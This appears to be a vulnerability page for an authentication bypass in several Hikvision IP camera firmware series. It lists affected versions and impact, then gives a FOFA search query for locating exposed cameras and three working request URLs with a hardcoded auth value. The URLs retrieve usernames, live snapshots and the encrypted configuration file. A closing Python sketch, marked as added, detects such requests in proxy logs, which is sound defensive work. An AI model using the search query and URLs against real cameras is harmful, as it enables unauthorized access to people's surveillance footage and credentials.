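Principle
A classic unauthorized-access flaw: the sensitive paths do not verify the identity of the requester, so they can be accessed without authorization.
Affected versions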
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106
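Impact
Sensitive camera information that can be obtained:
- Usernames
- Camera snapshots
- The camera's user configuration file (encrypted; can be decrypted with a script)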
POC & EXP
fofa
app="HIKVISION-视频监控"
Manual
# Get the camera usernames
http://<camera-IP>/Security/users?auth=YWRtaW46MTEK
# Get a surveillance snapshot
http://<camera-IP>/onvif-http/snapshot?auth=YWRtaW46MTEK
# Get the camera configuration file
http://<camera-IP>/System/configurationFile?auth=YWRtaW46MTEK
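
For defenders, the requests above leave a recognizable trace: one of the three paths combined with an `auth` query parameter. The following detection sketch is an added example, not part of the original page; it assumes the cameras sit behind a reverse proxy or gateway that writes Common Log Format lines, and the function names and sample log lines are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# The three request paths listed on this page.
SENSITIVE_PATHS = {
    "/Security/users": "user list",
    "/onvif-http/snapshot": "snapshot",
    "/System/configurationFile": "configuration file",
}

# Assumption: Common Log Format, e.g. from a proxy in front of the cameras.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_auth(value):
    """Best-effort base64 decode of the auth value, for triage only."""
    try:
        # parse_qs turns '+' into ' ', so restore it before decoding.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
        return raw.decode("utf-8", "replace").strip()
    except ValueError:
        return None

def find_auth_param_hits(lines):
    """Return one record per request to a sensitive path carrying ?auth=."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.rstrip("/")
        params = parse_qs(url.query, keep_blank_values=True)
        if path in SENSITIVE_PATHS and "auth" in params:
            hits.append({
                "client": client,
                "resource": SENSITIVE_PATHS[path],
                "status": int(status),  # 200 means the device served it
                "auth_decoded": decode_auth(params["auth"][0]),
            })
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /onvif-http/snapshot HTTP/1.1" 401 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 40960',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 2048',
]
```

Hits with status 200 are the ones to triage first, since the device answered the request.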